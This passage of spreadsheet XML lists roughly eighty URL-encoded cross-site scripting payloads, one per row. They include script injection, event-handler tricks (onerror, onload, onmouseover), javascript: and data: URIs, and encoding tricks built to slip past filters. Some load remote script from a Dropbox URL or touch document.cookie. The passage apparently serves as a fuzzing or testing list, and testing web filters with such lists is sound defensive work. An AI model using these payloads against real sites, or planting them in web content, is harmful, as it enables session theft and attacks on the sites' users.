      </c>
    </row>
    <row r="594">
      <c r="A594" s="3" t="s">
        <v>591</v>
      </c>
      <c r="B594" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%2Fsrc%3D%27http%3A%2F%2Fi.imgur.com%2FP8mL8.jpg%27%20onmouseover%3D%26Tab%3Bprompt%281%29</v>
      </c>
    </row>
    <row r="595">
      <c r="A595" s="3" t="s">
        <v>592</v>
      </c>
      <c r="B595" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26%2334%3B%26%2362%3B%3Csvg%3E%3Cstyle%3E%7B-o-link-source%26colon%3B%27%3Cbody%2Fonload%3Dconfirm%281%29%3E%27</v>
      </c>
    </row>
    <row r="596">
      <c r="A596" s="3" t="s">
        <v>593</v>
      </c>
      <c r="B596" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26%2313%3B%3Cblink%2F%26%2313%3B%20onmouseover%3Dpr%26%23x6F%3Bmp%26%23116%3B%281%29%3EOnMouseOver%20%7BFirefox%20%26%20Opera%7D</v>
      </c>
    </row>
    <row r="597">
      <c r="A597" s="3" t="s">
        <v>594</v>
      </c>
      <c r="B597" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cmarquee%20onstart%3D%27javascript%3Aalert%26%23x28%3B1%26%23x29%3B%27%3E%5E__%5E</v>
      </c>
    </row>
    <row r="598">
      <c r="A598" s="3" t="s">
        <v>595</v>
      </c>
      <c r="B598" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cdiv%2Fstyle%3D%22width%3Aexpression%28confirm%281%29%29%22%3EX%3C%2Fdiv%3E%20%7BIE7%7D</v>
      </c>
    </row>
    <row r="599">
      <c r="A599" s="3" t="s">
        <v>596</v>
      </c>
      <c r="B599" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ciframe%2F%2500%2F%20src%3DjavaSCRIPT%26colon%3Balert%281%29</v>
      </c>
    </row>
    <row r="600">
      <c r="A600" s="3" t="s">
        <v>597</v>
      </c>
      <c r="B600" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%2F%2F%3Cform%2Faction%3Djavascript%26%23x3A%3Balert%26lpar%3Bdocument%26period%3Bcookie%26rpar%3B%3E%3Cinput%2Ftype%3D%27submit%27%3E%2F%2F</v>
      </c>
    </row>
    <row r="601">
      <c r="A601" s="3" t="s">
        <v>598</v>
      </c>
      <c r="B601" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%2F%2Aiframe%2Fsrc%2A%2F%3Ciframe%2Fsrc%3D%22%3Ciframe%2Fsrc%3D%40%22%2Fonload%3Dprompt%281%29%20%2F%2Aiframe%2Fsrc%2A%2F%3E</v>
      </c>
    </row>
    <row r="602">
      <c r="A602" s="3" t="s">
        <v>599</v>
      </c>
      <c r="B602" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%2F%2F%7C%5C%5C%20%3Cscript%20%2F%2F%7C%5C%5C%20src%3D%27https%3A%2F%2Fdl.dropbox.com%2Fu%2F13018058%2Fjs.js%27%3E%20%2F%2F%7C%5C%5C%20%3C%2Fscript%20%2F%2F%7C%5C%5C</v>
      </c>
    </row>
    <row r="603">
      <c r="A603" s="3" t="s">
        <v>600</v>
      </c>
      <c r="B603" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%2Ffont%3E%2F%3Csvg%3E%3Cstyle%3E%7Bsrc%26%23x3A%3B%27%3Cstyle%2Fonload%3Dthis.onload%3Dconfirm%281%29%3E%27%3C%2Ffont%3E%2F%3C%2Fstyle%3E</v>
      </c>
    </row>
    <row r="604">
      <c r="A604" s="3" t="s">
        <v>601</v>
      </c>
      <c r="B604" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%2Fhref%3D%22javascript%3A%26%2313%3B%20javascript%3Aprompt%281%29%22%3E%3Cinput%20type%3D%22X%22%3E</v>
      </c>
    </row>
    <row r="605">
      <c r="A605" s="3" t="s">
        <v>602</v>
      </c>
      <c r="B605" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%2Fplaintext%5C%3E%3C%2F%7C%5C%3E%3Cplaintext%2Fonmouseover%3Dprompt%281%29</v>
      </c>
    </row>
    <row r="606">
      <c r="A606" s="3" t="s">
        <v>603</v>
      </c>
      <c r="B606" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%2Fsvg%3E%27%27%3Csvg%3E%3Cscript%20%27AQuickBrownFoxJumpsOverTheLazyDog%27%3Ealert%26%23x28%3B1%26%23x29%3B%20%7BOpera%7D</v>
      </c>
    </row>
    <row r="607">
      <c r="A607" s="3" t="s">
        <v>604</v>
      </c>
      <c r="B607" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22javascript%26colon%3B%5Cu0061%26%23x6C%3B%26%23101%2572t%26lpar%3B1%26rpar%3B%22%3E%3Cbutton%3E</v>
      </c>
    </row>
    <row r="608">
      <c r="A608" s="3" t="s">
        <v>605</v>
      </c>
      <c r="B608" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cdiv%20onmouseover%3D%27alert%26lpar%3B1%26rpar%3B%27%3EDIV%3C%2Fdiv%3E</v>
      </c>
    </row>
    <row r="609">
      <c r="A609" s="3" t="s">
        <v>606</v>
      </c>
      <c r="B609" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ciframe%20style%3D%22position%3Aabsolute%3Btop%3A0%3Bleft%3A0%3Bwidth%3A100%25%3Bheight%3A100%25%22%20onmouseover%3D%22prompt%281%29%22%3E</v>
      </c>
    </row>
    <row r="610">
      <c r="A610" s="3" t="s">
        <v>607</v>
      </c>
      <c r="B610" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22jAvAsCrIpT%26colon%3Balert%26lpar%3B1%26rpar%3B%22%3EX%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="611">
      <c r="A611" s="3" t="s">
        <v>608</v>
      </c>
      <c r="B611" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cembed%20src%3D%22http%3A%2F%2Fcorkami.googlecode.com%2Fsvn%2F%21svn%2Fbc%2F480%2Ftrunk%2Fmisc%2Fpdf%2Fhelloworld_js_X.pdf%22%3E</v>
      </c>
    </row>
    <row r="612">
      <c r="A612" s="3" t="s">
        <v>609</v>
      </c>
      <c r="B612" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cobject%20data%3D%22http%3A%2F%2Fcorkami.googlecode.com%2Fsvn%2F%21svn%2Fbc%2F480%2Ftrunk%2Fmisc%2Fpdf%2Fhelloworld_js_X.pdf%22%3E</v>
      </c>
    </row>
    <row r="613">
      <c r="A613" s="3" t="s">
        <v>610</v>
      </c>
      <c r="B613" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cvar%20onmouseover%3D%22prompt%281%29%22%3EOn%20Mouse%20Over%3C%2Fvar%3E</v>
      </c>
    </row>
    <row r="614">
      <c r="A614" s="3" t="s">
        <v>611</v>
      </c>
      <c r="B614" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3Djavascript%26colon%3Balert%26lpar%3Bdocument%26period%3Bcookie%26rpar%3B%3EClick%20Here%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="615">
      <c r="A615" s="3" t="s">
        <v>612</v>
      </c>
      <c r="B615" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20src%3D%22%2F%22%20%3D_%3D%22%20title%3D%22onerror%3D%27prompt%281%29%27%22%3E</v>
      </c>
    </row>
    <row r="616">
      <c r="A616" s="3" t="s">
        <v>613</v>
      </c>
      <c r="B616" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%25%3C%21--%27%25%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%20--%3E</v>
      </c>
    </row>
    <row r="617">
      <c r="A617" s="3" t="s">
        <v>614</v>
      </c>
      <c r="B617" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%20src%3D%22data%3Atext%2Fjavascript%2Calert%281%29%22%3E%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="618">
      <c r="A618" s="3" t="s">
        <v>615</v>
      </c>
      <c r="B618" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ciframe%2Fsrc%20%5C%2F%5C%2Fonload%20%3D%20prompt%281%29</v>
      </c>
    </row>
    <row r="619">
      <c r="A619" s="3" t="s">
        <v>616</v>
      </c>
      <c r="B619" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ciframe%2Fonreadystatechange%3Dalert%281%29</v>
      </c>
    </row>
    <row r="620">
      <c r="A620" s="3" t="s">
        <v>617</v>
      </c>
      <c r="B620" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Csvg%2Fonload%3Dalert%281%29</v>
      </c>
    </row>
    <row r="621">
      <c r="A621" s="3" t="s">
        <v>618</v>
      </c>
      <c r="B621" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cinput%20value%3D%3C%3E%3Ciframe%2Fsrc%3Djavascript%3Aconfirm%281%29</v>
      </c>
    </row>
    <row r="622">
      <c r="A622" s="3" t="s">
        <v>619</v>
      </c>
      <c r="B622" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cinput%20type%3D%22text%22%20value%3D%60%60%20%3Cdiv%2Fonmouseover%3D%27alert%281%29%27%3EX%3C%2Fdiv%3E</v>
      </c>
    </row>
    <row r="623">
      <c r="A623" s="3" t="s">
        <v>620</v>
      </c>
      <c r="B623" s="4" t="str">
        <f t="shared" si="1"/>
        <v>http%3A%2F%2Fwww.%3Cscript%3Ealert%281%29%3C%2Fscript%20.com</v>
      </c>
    </row>
    <row r="624">
      <c r="A624" s="3" t="s">
        <v>621</v>
      </c>
      <c r="B624" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ciframe%20src%3Dj%26NewLine%3B%26Tab%3Ba%26NewLine%3B%26Tab%3B%26Tab%3Bv%26NewLine%3B%26Tab%3B%26Tab%3B%26Tab%3Ba%26NewLine%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3Bs%26NewLine%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3Bc%26NewLine%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3Br%26NewLine%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3Bi%26NewLine%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3Bp%26NewLine%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3Bt%26NewLine%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26colon%3Ba%26NewLine%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3Bl%26NewLine%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3Be%26NewLine%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3Br%26NewLine%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3Bt%26NewLine%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B28%26NewLine%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B1%26NewLine%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%26Tab%3B%2529%3E%3C%2Fiframe%3E</v>
      </c>
    </row>
    <row r="625">
      <c r="A625" s="3" t="s">
        <v>622</v>
      </c>
      <c r="B625" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Csvg%3E%3Cscript%20%3F%3Ealert%281%29</v>
      </c>
    </row>
    <row r="626">
      <c r="A626" s="3" t="s">
        <v>623</v>
      </c>
      <c r="B626" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ciframe%20src%3Dj%26Tab%3Ba%26Tab%3Bv%26Tab%3Ba%26Tab%3Bs%26Tab%3Bc%26Tab%3Br%26Tab%3Bi%26Tab%3Bp%26Tab%3Bt%26Tab%3B%3Aa%26Tab%3Bl%26Tab%3Be%26Tab%3Br%26Tab%3Bt%26Tab%3B%2528%26Tab%3B1%26Tab%3B%2529%3E%3C%2Fiframe%3E</v>
      </c>
    </row>
    <row r="627">
      <c r="A627" s="3" t="s">
        <v>624</v>
      </c>
      <c r="B627" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20src%3D%60xx%3Axx%60onerror%3Dalert%281%29%3E</v>
      </c>
    </row>
    <row r="628">
      <c r="A628" s="3" t="s">
        <v>625</v>
      </c>
      <c r="B628" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cobject%20type%3D%22text%2Fx-scriptlet%22%20data%3D%22http%3A%2F%2Fjsfiddle.net%2FXLE63%2F%20%22%3E%3C%2Fobject%3E</v>
      </c>
    </row>
    <row r="629">
      <c r="A629" s="3" t="s">
        <v>626</v>
      </c>
      <c r="B629" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cmeta%20http-equiv%3D%22refresh%22%20content%3D%220%3Bjavascript%26colon%3Balert%281%29%22%2F%3E</v>
      </c>
    </row>
    <row r="630">
      <c r="A630" s="3" t="s">
        <v>627</v>
      </c>
      <c r="B630" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cmath%3E%3Ca%20xlink%3Ahref%3D%22%2F%2Fjsfiddle.net%2Ft846h%2F%22%3Eclick</v>
      </c>
    </row>
    <row r="631">
      <c r="A631" s="3" t="s">
        <v>628</v>
      </c>
      <c r="B631" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cembed%20code%3D%22http%3A%2F%2Fbusinessinfo.co.uk%2Flabs%2Fxss%2Fxss.swf%22%20allowscriptaccess%3Dalways%3E</v>
      </c>
    </row>
    <row r="632">
      <c r="A632" s="3" t="s">
        <v>629</v>
      </c>
      <c r="B632" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Csvg%20contentScriptType%3Dtext%2Fvbs%3E%3Cscript%3EMsgBox%2B1</v>
      </c>
    </row>
    <row r="633">
      <c r="A633" s="3" t="s">
        <v>630</v>
      </c>
      <c r="B633" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22data%3Atext%2Fhtml%3Bbase64_%2C%3Csvg%2Fonload%3D%5Cu0061%26%23x6C%3B%26%23101%2572t%281%29%3E%22%3EX%3C%2Fa</v>
      </c>
    </row>
    <row r="634">
      <c r="A634" s="3" t="s">
        <v>631</v>
      </c>
      <c r="B634" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ciframe%2Fonreadystatechange%3D%5Cu0061%5Cu006C%5Cu0065%5Cu0072%5Cu0074%28%27%5Cu0061%27%29%20worksinIE%3E</v>
      </c>
    </row>
    <row r="635">
      <c r="A635" s="3" t="s">
        <v>632</v>
      </c>
      <c r="B635" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%3E%7E%27%5Cu0061%27%20%3B%20%5Cu0074%5Cu0068%5Cu0072%5Cu006F%5Cu0077%20%7E%20%5Cu0074%5Cu0068%5Cu0069%5Cu0073.%20%5Cu0061%5Cu006C%5Cu0065%5Cu0072%5Cu0074%28%7E%27%5Cu0061%27%29%3C%2Fscript%20U%2B</v>
      </c>
    </row>
    <row r="636">
      <c r="A636" s="3" t="s">
        <v>633</v>
      </c>
      <c r="B636" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%2Fsrc%3D%22data%26colon%3Btext%252Fj%5Cu0061v%5Cu0061script%2C%5Cu0061lert%28%27%5Cu0061%27%29%22%3E%3C%2Fscript%20a%3D%5Cu0061%20%26%20%2F%3D%252F</v>
      </c>
    </row>
    <row r="637">
      <c r="A637" s="3" t="s">
        <v>634</v>
      </c>
      <c r="B637" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%2Fsrc%3Ddata%26colon%3Btext%2Fj%5Cu0061v%5Cu0061%26%23115%26%2399%26%23114%26%23105%26%23112%26%23116%2C%5Cu0061%256C%2565%2572%2574%28%2FXSS%2F%29%3E%3C%2Fscript</v>
      </c>
    </row>
    <row r="638">
      <c r="A638" s="3" t="s">
        <v>635</v>
      </c>
      <c r="B638" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cobject%20data%3Djavascript%26colon%3B%5Cu0061%26%23x6C%3B%26%23101%2572t%281%29%3E</v>
      </c>
    </row>
    <row r="639">
      <c r="A639" s="3" t="s">
        <v>636</v>
      </c>
      <c r="B639" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%3E%2B-%2B-1-%2B-%2Balert%281%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="640">
      <c r="A640" s="3" t="s">
        <v>637</v>
      </c>
      <c r="B640" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cbody%2Fonload%3D%26lt%3B%21--%26gt%3B%26%2310alert%281%29%3E</v>
      </c>
    </row>
    <row r="641">
      <c r="A641" s="3" t="s">
        <v>638</v>
      </c>
      <c r="B641" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%20itworksinallbrowsers%3E%2F%2A%3Cscript%2A%20%2A%2Falert%281%29%3C%2Fscript</v>
      </c>
    </row>
    <row r="642">
      <c r="A642" s="3" t="s">
        <v>639</v>
      </c>
      <c r="B642" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20src%20%3Fitworksonchrome%3F%5C%2Fonerror%20%3D%20alert%281%29</v>
      </c>
    </row>
    <row r="643">
      <c r="A643" s="3" t="s">
        <v>640</v>
      </c>
      <c r="B643" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Csvg%3E%3Cscript%3E%2F%2F%26NewLine%3Bconfirm%281%29%3B%3C%2Fscript%20%3C%2Fsvg%3E</v>
      </c>
    </row>
    <row r="644">
      <c r="A644" s="3" t="s">
        <v>641</v>
      </c>
      <c r="B644" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Csvg%3E%3Cscript%20onlypossibleinopera%3A-%29%3E%20alert%281%29</v>
      </c>
    </row>
    <row r="645">
      <c r="A645" s="3" t="s">
        <v>642</v>
      </c>
      <c r="B645" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20aa%20aaa%20aaaa%20aaaaa%20aaaaaa%20aaaaaaa%20aaaaaaaa%20aaaaaaaaa%20aaaaaaaaaa%20href%3Dj%26%2397v%26%2397script%26%23x3A%3B%26%2397lert%281%29%3EClickMe</v>
      </c>
    </row>
    <row r="646">
      <c r="A646" s="3" t="s">
        <v>643</v>
      </c>
      <c r="B646" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%20x%3E%20alert%281%29%20%3C%2Fscript%201%3D2</v>
      </c>
    </row>
    <row r="647">
      <c r="A647" s="3" t="s">
        <v>644</v>
      </c>
      <c r="B647" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cdiv%2Fonmouseover%3D%27alert%281%29%27%3E%20style%3D%22x%3A%22%3E</v>
      </c>
    </row>
    <row r="648">
      <c r="A648" s="3" t="s">
        <v>645</v>
      </c>
      <c r="B648" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C--%60%3Cimg%2Fsrc%3D%60%20onerror%3Dalert%281%29%3E%20--%21%3E</v>
      </c>
    </row>
    <row r="649">
      <c r="A649" s="3" t="s">
        <v>646</v>
      </c>
      <c r="B649" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%2Fsrc%3D%26%23100%26%2397%26%23116%26%2397%3Atext%2F%26%23x6a%26%23x61%26%23x76%26%23x61%26%23x73%26%23x63%26%23x72%26%23x69%26%23x000070%26%23x074%2C%26%23x0061%3B%26%23x06c%3B%26%23x0065%3B%26%23x00000072%3B%26%23x00074%3B%281%29%3E%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="650">
      <c r="A650" s="3" t="s">
        <v>647</v>
      </c>
      <c r="B650" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cdiv%20style%3D%22position%3Aabsolute%3Btop%3A0%3Bleft%3A0%3Bwidth%3A100%25%3Bheight%3A100%25%22%20onmouseover%3D%22prompt%281%29%22%20onclick%3D%22alert%281%29%22%3Ex%3C%2Fbutton%3E</v>
      </c>
    </row>
    <row r="651">
      <c r="A651" s="3" t="s">
        <v>648</v>
      </c>
      <c r="B651" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3E%3Cimg%20src%3Dx%20onerror%3Dwindow.open%28%27https%3A%2F%2Fwww.google.com%2F%27%29%3B%3E%3Cform%3E%3Cbutton%20formaction%3Djavascript%26colon%3Balert%281%29%3ECLICKME%3Cmath%3E%3Ca%20xlink%3Ahref%3D%2F%2Fjsfiddle.net%2Ft846h%2F%22%3Eclick</v>
      </c>
    </row>
    <row r="652">
      <c r="A652" s="3" t="s">
        <v>649</v>
      </c>
      <c r="B652" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cobject%20data%3Ddata%3Atext%2Fhtml%3Bbase64%2CPHN2Zy9vbmxvYWQ9YWxlcnQoMik%2B%3E%3C%2Fobject%3E</v>
      </c>
    </row>
    <row r="653">
      <c r="A653" s="3" t="s">
        <v>650</v>
      </c>
      <c r="B653" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ciframe%20src%3D%22data%3Atext%2Fhtml%2C%253C%2573%2563%2572%2569%2570%2574%253E%2561%256C%2565%2572%2574%2528%2531%2529%253C%252F%2573%2563%2572%2569%2570%2574%253E%22%3E%3C%2Fiframe%3E</v>
      </c>
    </row>
    <row r="654">
      <c r="A654" s="3" t="s">
        <v>651</v>
      </c>
      <c r="B654" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22data%3Atext%2Fhtml%3Bblabla%2C%26%2360%26%23115%26%2399%26%23114%26%23105%26%23112%26%23116%26%2332%26%23115%26%23114%26%2399%26%2361%26%2334%26%23104%26%23116%26%23116%26%23112%26%2358%26%2347%26%2347%26%23115%26%23116%26%23101%26%23114%26%23110%26%23101%26%23102%26%2397%26%23109%26%23105%26%23108%26%23121%26%2346%26%23110%26%23101%26%23116%26%2347%26%23102%26%23111%26%23111%26%2346%26%23106%26%23115%26%2334%26%2362%26%2360%26%2347%26%23115%26%2399%26%23114%26%23105%26%23112%26%23116%26%2362%26%238203%22%3EClick%20Me%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="655">
      <c r="A655" s="3" t="s">
        <v>652</v>
      </c>
      <c r="B655" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%E2%80%98%3B%20alert%281%29%3B</v>
      </c>
    </row>
    <row r="656">
      <c r="A656" s="3" t="s">
        <v>653</v>
      </c>
      <c r="B656" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%E2%80%98%29alert%281%29%3B%2F%2F</v>
      </c>
    </row>
    <row r="657">
      <c r="A657" s="3" t="s">
        <v>654</v>
      </c>
      <c r="B657" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CScRiPt%3Ealert%281%29%3C%2FsCriPt%3E</v>
      </c>
    </row>
    <row r="658">
      <c r="A658" s="3" t="s">
        <v>655</v>
      </c>
      <c r="B658" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3DjAVasCrIPt%3Aalert%28%E2%80%98XSS%E2%80%99%29%3E</v>
      </c>
    </row>
    <row r="659">
      <c r="A659" s="3" t="s">
        <v>656</v>
      </c>
      <c r="B659" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3D%E2%80%9Djavascript%3Aalert%28%E2%80%98XSS%E2%80%99%29%3B%E2%80%9D%3E</v>
      </c>
    </row>
    <row r="660">
      <c r="A660" s="3" t="s">
        <v>657</v>
      </c>
      <c r="B660" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Djavascript%3Aalert%28%26quot%3BXSS%26quot%3B%29%3E</v>
      </c>
    </row>
    <row r="661">
      <c r="A661" s="3" t="s">
        <v>658</v>
      </c>
      <c r="B661" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Djavascript%3Aalert%28%E2%80%98XSS%E2%80%99%29%3E</v>
      </c>
    </row>
    <row r="662">
      <c r="A662" s="3" t="s">
        <v>659</v>
      </c>
      <c r="B662" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20src%3Dxss%20onerror%3Dalert%281%29%3E</v>
      </c>
    </row>
    <row r="663">
      <c r="A663" s="3" t="s">
        <v>554</v>
      </c>
      <c r="B663" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ciframe%20%2500%20src%3D%22%26Tab%3Bjavascript%3Aprompt%281%29%26Tab%3B%22%2500%3E</v>
      </c>
    </row>
    <row r="664">
      <c r="A664" s="3" t="s">
        <v>555</v>
      </c>
      <c r="B664" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Csvg%3E%3Cstyle%3E%7Bfont-family%26colon%3B%27%3Ciframe%2Fonload%3Dconfirm%281%29%3E%27</v>
      </c>
    </row>
    <row r="665">
      <c r="A665" s="3" t="s">
        <v>556</v>
      </c>
      <c r="B665" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cinput%2Fonmouseover%3D%22javaSCRIPT%26colon%3Bconfirm%26lpar%3B1%26rpar%3B%22</v>
      </c>
    </row>
    <row r="666">
      <c r="A666" s="3" t="s">
        <v>557</v>
      </c>
      <c r="B666" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CsVg%3E%3CscRipt%20%2500%3Ealert%26lpar%3B1%26rpar%3B%20%7BOpera%7D</v>
      </c>
    </row>
    <row r="667">
      <c r="A667" s="3" t="s">
        <v>558</v>
      </c>
      <c r="B667" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%2Fsrc%3D%60%2500%60%20onerror%3Dthis.onerror%3Dconfirm%281%29</v>
      </c>
    </row>
    <row r="668">
      <c r="A668" s="3" t="s">
        <v>559</v>
      </c>
      <c r="B668" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cform%3E%3Cisindex%20formaction%3D%22javascript%26colon%3Bconfirm%281%29%22</v>
      </c>
    </row>
    <row r="669">
      <c r="A669" s="3" t="s">
        <v>560</v>
      </c>
      <c r="B669" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20src%3D%60%2500%60%26NewLine%3B%20onerror%3Dalert%281%29%26NewLine%3B</v>
      </c>
    </row>
    <row r="670">
      <c r="A670" s="3" t="s">
        <v>561</v>
      </c>
      <c r="B670" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%2F%26Tab%3B%20src%3D%27https%3A%2F%2Fdl.dropbox.com%2Fu%2F13018058%2Fjs.js%27%20%2F%26Tab%3B%3E%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="671">
      <c r="A671" s="3" t="s">
        <v>562</v>
      </c>
      <c r="B671" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CScRipT%205-0%2A3%2B9%2F3%3D%3Eprompt%281%29%3C%2FScRipT%20giveanswerhere%3D%3F</v>
      </c>
    </row>
    <row r="672">
      <c r="A672" s="3" t="s">
        <v>563</v>
      </c>
      <c r="B672" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ciframe%2Fsrc%3D%22data%3Atext%2Fhtml%3B%26Tab%3Bbase64%26Tab%3B%2CPGJvZHkgb25sb2FkPWFsZXJ0KDEpPg%3D%3D%22%3E</v>
      </c>
    </row>
    <row r="673">
      <c r="A673" s="3" t="s">
        <v>564</v>
      </c>
      <c r="B673" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%20%2F%2A%2500%2A%2F%3E%2F%2A%2500%2A%2Falert%281%29%2F%2A%2500%2A%2F%3C%2Fscript%20%2F%2A%2500%2A%2F</v>
      </c>
    </row>
    <row r="674">
      <c r="A674" s="3" t="s">
        <v>565</v>
      </c>
      <c r="B674" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26%2334%3B%26%2362%3B%3Ch1%2Fonmouseover%3D%27%5Cu0061lert%281%29%27%3E%2500</v>
      </c>
    </row>
    <row r="675">
      <c r="A675" s="3" t="s">
        <v>566</v>
      </c>
      <c r="B675" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ciframe%2Fsrc%3D%22data%3Atext%2Fhtml%2C%3Csvg%20%26%23111%3B%26%23110%3Bload%3Dalert%281%29%3E%22%3E</v>
      </c>
    </row>
    <row r="676">
      <c r="A676" s="3" t="s">
